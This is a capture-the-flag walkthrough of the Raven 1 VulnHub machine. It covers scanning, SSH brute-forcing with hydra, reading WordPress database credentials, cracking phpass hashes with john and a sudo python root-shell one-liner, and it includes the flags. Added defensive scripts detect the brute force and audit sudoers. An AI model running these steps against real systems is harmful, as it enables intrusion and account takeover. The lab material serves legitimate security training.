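Background overview:
Download: https://www.vulnhub.com/entry/raven-1,256/
The target machine's IP in this walkthrough is 100.10.10.132. Add this IP address to the hosts file, mapped to the domain name raven.local.
Technical points:
Use the arp-scan -l command to scan for live hosts on the local network.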
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1 00:50:56:c0:00:08 VMware, Inc.
100.10.10.132 00:0c:29:5a:b1:05 VMware, Inc.
100.10.10.253 00:50:56:f5:d5:54 VMware, Inc.
100.10.10.254 00:50:56:e1:62:61 VMware, Inc.
From the MAC address we can identify the target's IP address as 100.10.10.132.
Use nmap to scan the target host for open ports, with the command nmap -sS -Pn -p 1-65535 100.10.10.132.
└─# nmap -sS -Pn -p 1-65535 100.10.10.132
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:41 CST
Nmap scan report for 100.10.10.132
Host is up (0.00083s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
40396/tcp open unknown
MAC Address: 00:0C:29:5A:B1:05 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds
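The results show that the target host has ports 22, 80, 111 and 40396 open.
Information gathering showed that port 80 is open, so we browse the site and read the page source. The source of http://raven.local/service.html contains a flag: <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->
The site also has http://raven.local/wordpress/, and the wordpress path suggests that the site is built on the WordPress CMS, so we can scan it with wpscan.
First update the vulnerability database.
wpscan --update
Then scan the URL.
wpscan --url http://raven.local/wordpress/
The scan gives the following: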
server: Apache/2.4.10 (Debian)
WordPress version 4.8.17
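Nothing here is exploitable.
The site has the URL http://raven.local/wordpress/index.php/author/michael/, which reveals the username MICHAEL.
We can try brute-forcing the SSH service with this username.
Use hydra for the password brute force, with the classic fasttrack.txt wordlist.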
hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local
No password was found.
We switch to a wordlist generated by cupp and run it again. [cupp installation guide]
└─# cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: michael # enter the username
> Surname: michael # enter the username
> Nickname: michael # enter the username
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!
cupp writes the wordlist to michael.txt. Run the brute force again with this file, using the command hydra -l michael -P ./michael.txt ssh://raven.local.
└─# hydra -l michael -P ./michael.txt ssh://raven.local
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-28 14:49:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task
[DATA] attacking ssh://raven.local:22/
[22][ssh] host: raven.local login: michael password: michael
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-28 14:49:37
The brute force found the account michael with the password michael.
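A defender's view of the run above, as an added example that is not part of the original walkthrough: hydra's 60 attempts in a few seconds leave a burst of failed logins in the sshd log, followed by a success from the same source. The log lines are constructed for illustration, and the function name, threshold, window and year are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth.log lines (not from the page): six failures for one
# account from one source, then a success, plus an ordinary mistyped login.
SAMPLE_LOG = "\n".join(
    [f"Dec 28 14:49:3{i} Raven sshd[210{i}]: Failed password for michael "
     f"from 100.10.10.129 port 5011{i} ssh2" for i in range(1, 7)]
    + ["Dec 28 14:49:37 Raven sshd[2107]: Accepted password for michael "
       "from 100.10.10.129 port 50117 ssh2",
       "Dec 28 15:02:10 Raven sshd[2300]: Failed password for steven "
       "from 100.10.10.1 port 40000 ssh2",
       "Dec 28 15:02:18 Raven sshd[2301]: Accepted password for steven "
       "from 100.10.10.1 port 40001 ssh2"]
)

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_guessed_logins(log_text, threshold=5,
                          window=timedelta(seconds=60), year=2021):
    """Return logins that succeeded right after a burst of failures
    for the same account from the same source address."""
    failures = defaultdict(list)  # (ip, user) -> timestamps of failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Classic syslog timestamps carry no year, so the caller supplies it.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        recent = [t for t in failures[key] if ts - t <= window]
        if m["result"] == "Failed":
            failures[key] = recent + [ts]
        else:
            if len(recent) >= threshold:
                alerts.append({"ip": m["ip"], "user": m["user"],
                               "failures": len(recent), "login_at": m["ts"]})
            failures[key] = []  # a success resets the counter
    return alerts

if __name__ == "__main__":
    for alert in detect_guessed_logins(SAMPLE_LOG):
        print(alert)
```

A single mistyped password followed by a normal login stays below the threshold and raises no alert.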
Log in with this account and password. The command is ssh michael@raven.local. You will be asked whether to continue connecting; enter yes.
└─# ssh michael@raven.local
The authenticity of host 'raven.local (100.10.10.132)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts.
michael@raven.local's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Dec 27 18:25:22 2021 from 100.10.10.129
michael@Raven:~$
Use the command uname -a to check the kernel version.
michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
No exploitable vulnerability was found.
Check the SUID binaries.
michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs
Nothing exploitable here.
Browsing the site directory /var/www, we find the file flag2.txt.
michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
Next, look at the site's configuration file /var/www/html/wordpress/wp-config.php.
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
This reveals the MySQL account root with the password R@v3nSecurity.
Connect to the MySQL database with the command mysql -h localhost -u root -pR@v3nSecurity.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Use the command show databases; to list the databases.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
Use the command use wordpress to switch to the wordpress database.
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Use the command show tables to see which tables the current database contains.
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
Use the command select * from wp_users to view the contents of the wp_users table.
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
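We find the username steven and its password $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/. The password is stored as a hash, not in plaintext.
First export the account names and password hashes to a text file.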
mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
Query OK, 2 rows affected (0.00 sec)
View the contents of the file.
michael@Raven:/usr/share$ cat /tmp/wordpress.txt
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
Start an HTTP service on the target host to transfer the wordpress.txt file. On the target host, change to the /tmp directory and run the command python -m SimpleHTTPServer 8888.
michael@Raven:/tmp$ python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
On Kali, download the wordpress.txt file from the target host with the command wget http://raven.local:8888/wordpress.txt.
└─# wget http://raven.local:8888/wordpress.txt
--2021-12-28 16:27:32-- http://raven.local:8888/wordpress.txt
正在解析主机 raven.local (raven.local)... 100.10.10.132
正在连接 raven.local (raven.local)|100.10.10.132|:8888... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:85 [text/plain]
正在保存至: “wordpress.txt”
wordpress.txt 100%[=====================================================>] 85 --.-KB/s 用时 0s
2021-12-28 16:27:32 (1.47 MB/s) - 已保存 “wordpress.txt” [85/85])
Use the well-known rockyou.txt wordlist (bundled with Kali) to crack the passwords. In the /usr/share/wordlists directory, run the following command to produce the rockyou.txt file.
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz
gzip -d rockyou.txt.gz
On the Kali machine, change to the directory containing wordpress.txt and run the following command to crack the passwords with john.
└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84 (steven)
This gives pink84 as the password of the steven account.
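What the stored $P$ value encodes, as an added example that is not part of the original walkthrough: the fourth character carries the cost that john reports as "iteration count 8192", and a login check recomputes that many rounds of MD5 over the salt and password. This is the portable phpass scheme that john names in its output; the function names are assumptions of this example.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
STEVEN_HASH = "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/"  # from wp_users on the page

def parse_phpass(stored):
    """Split a portable phpass hash into (iterations, salt, digest)."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    log2 = ITOA64.index(stored[3])          # cost is stored as log2
    if not 7 <= log2 <= 30:
        raise ValueError("iteration exponent out of range")
    return 1 << log2, stored[4:12], stored[12:]

def _encode64(data):
    """phpass's own base64 variant: little-endian, 6 bits per character."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def phpass_verify(password, stored):
    """Recompute the hash the way a login check does and compare."""
    count, salt, _ = parse_phpass(stored)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):                  # the only work factor: MD5 rounds
        digest = hashlib.md5(digest + pw).digest()
    return hmac.compare_digest(stored[:12] + _encode64(digest), stored)

if __name__ == "__main__":
    print(parse_phpass(STEVEN_HASH)[:2], phpass_verify("pink84", STEVEN_HASH))
```

The salt and the cost slow each guess down, but neither compensates for a password that appears in a common wordlist.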
Connect remotely over SSH with this account, using the command ssh steven@raven.local.
└─# ssh steven@raven.local
steven@raven.local's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 27 18:43:33 2021 from 100.10.10.129
Check the current user's privileges.
$ whoami
steven
Try to escalate privileges through sudo python.
With the command sudo python3 -c 'import pty; pty.spawn("/bin/sh")', the escalation fails.
With the command sudo python -c 'import os; os.system("/bin/sh")', the escalation succeeds.
$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami
root
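One way to audit for the misconfiguration this step relies on, as an added example that is not part of the original walkthrough: a sudo rule for a language interpreter is equivalent to a rule for a root shell. The page does not show the target's sudoers file, so the sample rules, the interpreter list and the function name audit_sudoers are assumptions.

```python
import os
import re

# Language interpreters: a sudo rule for one of these runs arbitrary code as
# the target user, so it is equivalent to granting a shell.
INTERPRETERS = {"python", "perl", "ruby", "php", "lua", "node"}
RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG = re.compile(r"([A-Z_]+):\s*")

# Constructed sudoers content for illustration (not read from the target).
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
steven  ALL=(ALL) NOPASSWD: /usr/bin/python
backup  ALL=(root) /usr/bin/rsync, /usr/bin/python2.7 /opt/report.py
"""

def audit_sudoers(text):
    """Return one finding per sudo rule entry that names an interpreter."""
    findings = []
    for line in map(str.strip, text.splitlines()):
        m = RULE.match(line)
        if not m or line.startswith(("#", "Defaults")):
            continue
        who, runas, cmds = m[1], m[2] or "root", m[3]
        nopasswd = False
        for item in map(str.strip, cmds.split(",")):
            while (t := TAG.match(item)):   # tags persist along the list
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(t[1], nopasswd)
                item = item[t.end():]
            path, _, args = item.partition(" ")
            # python2.7 and python3 are still python: drop the version suffix
            name = re.sub(r"[\d.]+$", "", os.path.basename(path))
            if name in INTERPRETERS:
                findings.append({"user": who, "runas": runas, "path": path,
                                 "nopasswd": nopasswd,
                                 "pinned_args": bool(args.strip())})
    return findings

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

An entry with pinned arguments only permits that exact command line, so it is reported separately from an unrestricted interpreter rule.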
Change to the /root directory and view the last flag.
# cd /root
# ls
flag4.txt
# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io